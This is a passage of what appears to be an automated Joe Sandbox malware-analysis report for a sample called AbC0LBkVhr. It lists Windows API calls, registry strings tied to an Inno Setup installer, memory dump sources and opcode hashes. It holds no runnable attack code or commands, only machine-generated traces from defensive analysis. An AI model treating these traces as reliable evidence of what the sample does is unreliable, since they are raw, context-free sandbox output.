                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                            • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                            • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                            • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                            • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                            • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                            • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                            • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                            • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                            • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                            • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                            • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                            • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                            • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                            • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                            • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                            • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                            • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                          • String ID: Setup
                                                          • API String ID: 3870281231-3839654196
                                                          • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                          • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                          • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                          • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID: 2H
                                                          • API String ID: 3660427363-1900415311
                                                          • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                          • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                          • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                          • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID: .tmp
                                                          • API String ID: 1375471231-2986845003
                                                          • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                          • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                          • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                          • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                          APIs
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                          • API String ID: 3535843008-1113070880
                                                          • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                          • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                          • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                          • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                          APIs
                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: Inno Setup: Setup Version$r_G
                                                          • API String ID: 3702945584-2380526977
                                                          • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                          • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                          • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                          • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateErrorFileHandleLast
                                                          • String ID: CreateFile
                                                          • API String ID: 2528220319-823142352
                                                          • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                          • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                          • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                          • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                          APIs
                                                            • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                          • API String ID: 2906209438-2320870614
                                                          • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                          • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                          • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                          • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                          APIs
                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                          • API String ID: 2492108670-2683653824
                                                          • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                          • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                          • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                          • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                          APIs
                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 2574300362-0
                                                          • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                          • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                          • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                          • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                          APIs
                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$Append$System
                                                          • String ID:
                                                          • API String ID: 1489644407-0
                                                          • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                          • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                          • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                          • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                          APIs
                                                          • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                          • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: D41500D41520D41540
                                                          • String ID:
                                                          • API String ID: 2153611984-0
                                                          • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                          • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                          • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                          • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                          • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                          • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A480A570ObjectSelect
                                                          • String ID:
                                                          • API String ID: 1230475511-0
                                                          • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                          • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                          • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                          • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DrawText$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 65125430-0
                                                          • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                          • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                          • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                          • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                          APIs
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                          • TranslateMessage.USER32(?), ref: 00424487
                                                          • DispatchMessageA.USER32(?), ref: 00424491
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 4217535847-0
                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                          • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                          • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                          APIs
                                                          • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                          • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Prop$Window
                                                          • String ID:
                                                          • API String ID: 3363284559-0
                                                          • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                          • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                          • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                          • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                          • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                          • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
